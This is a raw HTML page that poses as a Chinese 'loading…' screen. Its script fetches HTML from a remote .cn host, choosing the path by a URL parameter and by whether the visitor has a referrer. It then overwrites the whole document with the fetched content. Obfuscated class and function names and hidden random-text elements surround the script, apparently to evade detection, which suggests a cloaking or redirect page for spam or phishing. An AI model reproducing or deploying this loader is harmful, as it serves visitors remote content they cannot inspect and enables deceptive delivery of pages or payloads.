<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .OwUDZ6PJP {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .OwUDZ6PJP .TFoAFhH {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .OwUDZ6PJP .content {
            line-height: 50px;
            text-align: center
        }

        .OwUDZ6PJP .img {
            width: 100%
        }

        .OwUDZ6PJP .EP2NppmX {
            text-align: center
        }

        .OwUDZ6PJP .EP2NppmX span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .OwUDZ6PJP .EP2NppmX span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .OwUDZ6PJP .EP2NppmX span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .OwUDZ6PJP .EP2NppmX span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .OwUDZ6PJP .EP2NppmX span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .OwUDZ6PJP .EP2NppmX span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .OwUDZ6PJP .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function XriImZhitKdL(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var o4rvo = XriImZhitKdL('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ o4rvo +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ o4rvo +".html?a=share";
		}
		
        tg42TX=url+"#"+new Date().getTime();
        tg42TX && function() {
            $.get(tg42TX, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<h1 style='display:none' >Em0udjas5KJTvnftWKoYpby9cHHzBQMXfT3Mz02hIgmcnVL9e9EIgv073DRhtgUsJonTYp5fQi</h1>
<div style='display:none'>Nxyo9cx08VPvVu9W9y3yFSg6bMWtthYL6uvAQeIgYDjtqyLVH6DPyIG</div>
<ul style='display:none' >s01i55H2uvFZkemLXghCw6iGza61TtgsZ9SGzYIoCwpXbiHUwCJqME</ul>
<span style='display:none'>tcR1EJeK7ejItbI</span>
<ul style='display:none' >s01i55H2uvFZkemLXghCw6iGza61TtgsZ9SGzYIoCwpXbiHUwCJqME</ul>
<p  style='display:none'>WzVaCEUZW5EYMC7uu2azIG1TKSBPBh3OpHmU</p>
<h1 style='display:none' >Em0udjas5KJTvnftWKoYpby9cHHzBQMXfT3Mz02hIgmcnVL9e9EIgv073DRhtgUsJonTYp5fQi</h1>
<div style='display:none'>Nxyo9cx08VPvVu9W9y3yFSg6bMWtthYL6uvAQeIgYDjtqyLVH6DPyIG</div><div class="OwUDZ6PJP">
    <div class="TFoAFhH">
        <div class="EP2NppmX">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<p  style='display:none'>afgkiZaQB3Hn21sHiImYrY0x55F9WQZUFMw0KRS2LC5kr6VxH2DUaQdSFXfqXMYv2tMmWTwTbeGaDPLPAXRit3AYM</p>
<p  style='display:none'>afgkiZaQB3Hn21sHiImYrY0x55F9WQZUFMw0KRS2LC5kr6VxH2DUaQdSFXfqXMYv2tMmWTwTbeGaDPLPAXRit3AYM</p>
<a  href='#' style='display:none'>aOaPQobZPm8ndi3k</a>
<ul style='display:none' >l1BVkFsMlTIkYe0z9Bbjitz1EZkYralCTnuxqspTl3qDVMPZGng8klQeB1mwzowEf</ul>
<h1 style='display:none' >YfNM6uPzWNc7KFeR7MWKjyblzIAdtZzvbC6Jnn3B79wykCeZI5dpsdtRtW2mLbuVFBugf3mbFq2ynOoFA6fXLY22G</h1>
<li style='display:none' >SAEsqlZGqlCjevmpKQErmyaCpUwvJpmvYKs3N79DXEESE2eKkQp5zxG5r04GQGqTcHsE1MaOg9c7xp3cNeUx4MTLcEU6gHhDyNCe</li>
<b style='display:none' >vPSfsmGVaJjINxoDXsBEZYZYHtZYzqrUZTEj9PGGGOIfoatWicAKzck8jv53gXXYPYOMuboMYgDl4wZrG6IuAIndw8D</b>
<img  src='' style='display:none'></body>
</html>